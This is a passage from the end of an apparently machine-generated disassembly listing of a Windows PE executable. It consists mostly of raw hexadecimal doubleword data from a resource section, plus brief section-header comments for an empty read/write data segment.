dd 4C1210C1h, 0EEE43D82h, 0DC6A3453h, 0D801EE40h, 0F9E57E6Ch
dd 0C918D09h, 0CE521918h, 484128CCh, 0E9F0F624h, 2A336A3Ch
dd 2EFB7B28h, 0F5B00722h, 0D62D2AABh, 0AC84AE8Ah, 9110B8E7h
dd 6A6C86F2h, 0B94C13EEh, 83E9EE6Fh, 7148524Dh, 0E0FB4723h
dd 59006AEDh, 4D243E3Fh, 6FE6B7F5h, 0DC0C2617h, 0D6FFE413h
dd 1CF0CC52h, 2117B78Fh, 0FC8DF5C5h, 0C7E2E57Ch, 143A5FDDh
dd 0DF0D54DEh, 5623C4C5h, 0C7AE88BAh, 44C4ACC7h, 9FAAFD34h
dd 0ACBA1195h, 976E2C0Dh, 0DBA2577Dh, 2F551A21h, 7322650Fh
dd 31FE5859h, 70C3D9B2h, 0B7A54071h, 719E3BCAh, 0BE0E282Dh
dd 1B321B98h, 157B9D11h, 9CEA3434h, 35EDE462h, 9382BBEBh
dd 783B8EDFh, 0E188FEC6h, 0DA533E44h, 0C9A4BA3Fh, 4294C4AFh
dd 81B8A516h, 0B4E96997h, 1A70BAA7h, 96B8187h, 8158719Ah
dd 4557E3EEh, 0A0735A6Bh, 0D658D4Ch, 2C2812h, 751B83C8h
dd 0ACEF2A1Bh, 2D3435EAh, 0A4F7D296h, 13EC05C3h, 825630CAh
dd 0FBE2DCF2h, 8797B1B0h, 0E3B5D4CAh, 923B3799h, 4EA28C91h
dd 0C112BF71h, 3A8AA4A6h, 974EBB1Ch, 0D0F94F8Dh, 0EF3538B9h
dd 51697475h, 86B9A96Ah, 0EECBBDAAh, 5F06607Eh, 0EB160FCEh
dd 471E23F5h, 0FA11FE1Eh, 0CEF1D1D6h, 12DD919Ch, 1A2D0838h
dd 0F0E7B04Ch, 0AE59D80Ch, 0B27FEDFBh, 0AC6CD5C3h, 0DA980BA0h
dd 929E3F6Fh, 38F6DBC4h, 36C5B8D3h, 0DB8196E1h, 0A13F0550h
dd 927CC008h, 0C1D16635h, 0A0A79523h, 0E87F9F7Ch, 61086248h
dd 11A71F84h, 0C1A9361Fh, 3D142E97h, 0CBE210h, 14D22125h
dd 26DE3A24h, 4097B3DDh, 8FBA9E83h, 9DA3CA84h, 0EDB3B7BFh
dd 0BDDBF0EEh, 0AACBA1B3h, 0A0E8C795h, 0C3E68A94h, 84B8ECE9h
dd 0D402DEBEh, 0E306EAF7h, 0E9375618h, 97D030Bh, 6794F02h
dd 43186568h, 234A213Eh, 6B130155h, 587F5559h, 237504Dh
dd 5F8A6B39h, 3BCF6960h, 6997909Dh, 31E28096h, 0DAF7DBC5h
dd 88CDBFB2h, 0D08DA8A2h, 5A594AC9h, 0F5ABAE3Ah, 3AC119ABh
dd 3719976h, 9EF698E6h, 0FB19CEF3h, 29C8D0Eh, 66DEE691h
dd 0C1475153h, 60D2D66Bh, 0B75AE7B9h, 380C02BFh, 4050BAC4h
dd 0EAD4FA02h, 67BD24C4h, 0F386544Ah, 0E6192A4Eh, 2DAF6D8h
dd 0F6CDBF80h, 1B2980DCh, 0AA4A302Dh, 0C92448E4h, 4B9D8788h
dd 75BAAA98h, 9DB912EEh, 25DD6069h, 97130A51h, 0ADD4CEF1h
dd 8DA96F40h, 0BDC2A0C0h, 0DBB05CB3h, 5A0165B3h, 7DFAB4BCh
dd 23259FFDh, 4C31215Ah
dd 0A2D196Bh, 69A933BAh, 64C73FEFh, 71DCCA2Bh, 73F20A02h
dd 0BF461BDFh, 0E0B7E1E2h, 91F380FBh, 0F5ADCDBAh, 0BCC1EEFDh
dd 4FA28AD6h, 997B6A69h, 9822DDC2h, 0DC5E6F0Ah, 0F457213Ah
dd 270A586Dh, 0ED30590Ah, 0A3CCB30Fh, 6074C4BCh, 77F03506h
dd 0C7F1B6C3h, 110096E1h, 5CB95845h, 0ECCC810Ah, 51E30707h
dd 0F59FBEAFh, 113BC364h, 0A1EEEE2Bh, 52A2F5FBh, 355E45ADh
dd 0EAC6FF8Dh, 0B40DACEBh, 95826866h, 675F6357h, 0A6A807Fh
dd 7DA68E8Dh, 60A5B55Bh, 82415B5Ch, 0A1CAB109h, 522943ACh
dd 0AB9C6A38h, 3A210215h, 2E042DC9h, 13067714h, 24CEB28Ch
dd 8184FACAh, 0AF6E6DCCh, 0F1C7D1D2h, 4A53DFA3h, 31503634h
dd 0CCA3BCADh, 8DA930D4h, 0BC0EAAFCh, 237F999Bh, 4270B1D0h
dd 0C05C00E4h, 7CDE7A33h, 8F4F696Ah, 4C434B1Dh, 0E5385152h
dd 542B45ADh, 4A437ACCh, 3CF2A921h, 4E862122h, 3DB3536h
dd 0C26B0629h, 0E2E2FCFCh, 12A1257h, 0F20061EBh, 0A436D7D8h
dd 0CAFB40C4h, 0CAD67EEBh, 0C7727387h, 0FC046FABh, 8104128Ch
dd 7675BFA0h, 6D967ED2h, 865DD890h, 5DCCE06Ch, 6D456F50h
dd 520978C9h, 0AA43AF48h, 0CE2EC4C3h, 3E152FBFh, 22A96AFh
dd 7B761728h, 0F02F0837h, 0F31B03A9h, 4A568C80h, 0F4CA84C2h
dd 0BE40533Ah, 51A6B6CDh, 0E0B6C077h, 0D4E0B7B6h, 0B8885B13h
dd 971CB9Eh, 0A2959123h, 0CA352075h, 1A6F7728h, 7CD0EBE3h
dd 0F9206062h, 9BC5CFC6h, 0BDFEA0B5h, 0C778C3C1h, 0A153C78h
dd 324BA936h, 0AED65B31h, 1AF2538Ah, 2DA0C700h, 21F9D3D3h
dd 7EE4AD6Eh, 6C4BCA91h, 0DD84FEE8h, 0A2A088FAh, 0CDD63FB4h
dd 3A80E8AAh, 2684C6FCh, 9148BD16h, 9D2E8787h, 0BA30397Ah
dd 5FDF0ABDh, 294AED07h, 553BEBD4h, 56304A7Bh, 0B2D8AABBh
dd 62ADCDCCh, 0CA0C1617h, 192C778Eh, 341F10Fh, 0F0E83232h
dd 33F03860h, 0FC4365E9h, 66C2ECEDh, 0EF86C344h, 0B9F895C5h
dd 0C02B47B9h, 44929C9Dh, 9FAAC534h, 0A4CF6B95h, 686EB8B9h
dd 0BB49B1E8h, 80E3FD71h, 8C4A544Bh, 570E5BECh, 0CECD1A4Dh
dd 4F166C1Ch, 731D91B6h, 0F40E2819h, 2B021CF5h, 1F9C4D11h
dd 3B07E985h, 0F585F7C7h, 81552BE4h, 68C4EECAh, 293B1113h
dd 14A33638h, 0F9B5C23Eh, 0ADA96DAFh, 0C48888A3h, 0D9FDF08Bh
dd 0E81C86AFh, 65046D0Ah, 7EA78DB7h, 2EA46312h, 81BFA5A6h
dd 0A2CBB19Dh, 7CD76C22h, 5728604Fh, 39100F93h, 88EC7E1Fh
dd 5507EDECh, 37A88D3Fh, 0F86A74C9h, 70D2DCC3h, 6EA0E8B1h
dd 90B8D2EFh, 0D7C69EECh, 40A243BDh, 0ED96DA75h, 1A1F5BF5h
dd 247EA8B5h, 0A5F38449h, 0D359BFDDh, 45D97700h, 8A46806Dh
dd 14AAA3A2h, 3EC9AFAEh, 535EFC86h, 0F6F53839h, 3B120395h
dd 2F16C821h, 2381415h, 15DEB008h, 0A09FBFBh, 3FD4EEEFh
dd 0A545E2C7h, 0CB71DAF3h, 0A5B03248h, 0CD4CDEA6h, 4A98B2B3h
dd 0E8BC82F3h, 44018010h, 9D44A538h, 6E86856Bh, 819E1788h
dd 150Dh dup(0)
dd 7Ch dup(?)
_rsrc ends
; Section 3. (virtual address 00021000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00020200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 421000h
align 2000h
_idata2 ends
end start